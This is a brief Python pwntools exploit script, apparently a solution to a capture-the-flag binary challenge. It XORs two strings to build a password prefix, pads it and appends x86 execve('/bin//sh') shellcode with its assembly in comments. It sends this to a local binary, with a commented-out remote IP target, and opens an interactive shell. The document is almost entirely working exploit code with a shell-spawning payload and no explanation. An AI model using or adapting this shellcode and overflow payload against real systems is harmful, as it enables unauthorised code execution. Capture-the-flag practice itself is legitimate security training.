from pwn import * s = 'The_Pursuit_of_Happiness' a = 'I_Need_BMW' pas = '' for i in range(len(a)): pas += chr(ord(s[i]) ^ ord(a[i])) # xor %ecx,%ecx # push $0x21 # pop %eax # sub %eax, 0x15 # push %ecx # push $0x68732f2f # push $0x6e69622f # mov %esp,%ebx # int $0x80
shellcode = "\x31\xc9\x6a\x21\x58\x83\xe8\x16\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" pas += 't_of_Happiness' + 'a' * 0x5b + shellcode p = process('./5afea37c3946a') # p = remote('101.71.29.5', 10034) p.sendlineafter('user name : ', 'a') p.sendlineafter('password : ', 'b') p.sendlineafter('information: ', pas) p.interactive()